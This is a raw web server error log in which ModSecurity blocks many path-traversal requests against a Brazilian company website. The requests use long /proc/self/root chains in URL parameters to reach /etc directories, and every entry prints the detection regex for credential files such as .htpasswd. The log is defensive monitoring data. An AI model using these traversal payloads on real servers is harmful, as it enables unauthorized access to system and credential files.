https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:26.166282 2026] [:error] [pid 15568:tid 140411725141760] [client 74.7.243.203:50350] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbBqQpVkWug9HeOt9IKQAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:27.263668 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.241.46:56174] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbB9SswJuvopo3lOhxTQAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:33:27.463520 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.243.203:50366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbB6TCbgAP5jq5Teg-hAAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:33:28.934161 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:50372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbCI6lpbStxTqkSkt9IQAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:40.434615 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:54694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbFLysWC90G-1nBrBWEgAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:33:42.875683 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.243.203:56462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbFtSswJuvopo3lOhxVQAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:33:47.471534 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.241.46:49504] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbG8_BxrYCr4hPDw_9FwAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:33:52.999170 2026] [:error] [pid 15568:tid 140411624429312] [client 74.7.241.46:51764] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbIKQpVkWug9HeOt9IOAAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:08.483530 2026] [:error] [pid 29507:tid 140411599251200] [client 74.7.241.46:51774] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbMEr9dMAiw-8KANNY0wAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:09.845089 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.241.46:60212] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbMf9ocpUE4ed4uDwEmwAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:13.106183 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.241.46:60228] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbNf9ocpUE4ed4uDwEnwAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:14.402727 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.241.46:60244] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbNqTCbgAP5jq5Teg-lAAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:15.529924 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:60248] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbN_9ocpUE4ed4uDwEowAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:16.856975 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.241.46:60254] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbONSswJuvopo3lOhxewAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:20.003126 2026] [:error] [pid 29802:tid 140411632822016] [client 74.7.241.46:60260] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbPM_BxrYCr4hPDw_9JQAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:20.201245 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.243.203:56476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbPNSswJuvopo3lOhxfwAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:34:22.391653 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.241.46:37918] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbPv9ocpUE4ed4uDwEpwAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:22.623838 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:36324] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbPo6lpbStxTqkSkt9NAAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:24.799190 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:37924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbQLABkC4fWIHEf8EFowAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:26.089079 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:37934] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbQv9ocpUE4ed4uDwEqwAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:34:28.803008 2026] [:error] [pid 15061:tid 140411658000128] [client 74.7.241.46:37942] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbRKTCbgAP5jq5Teg-mQAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
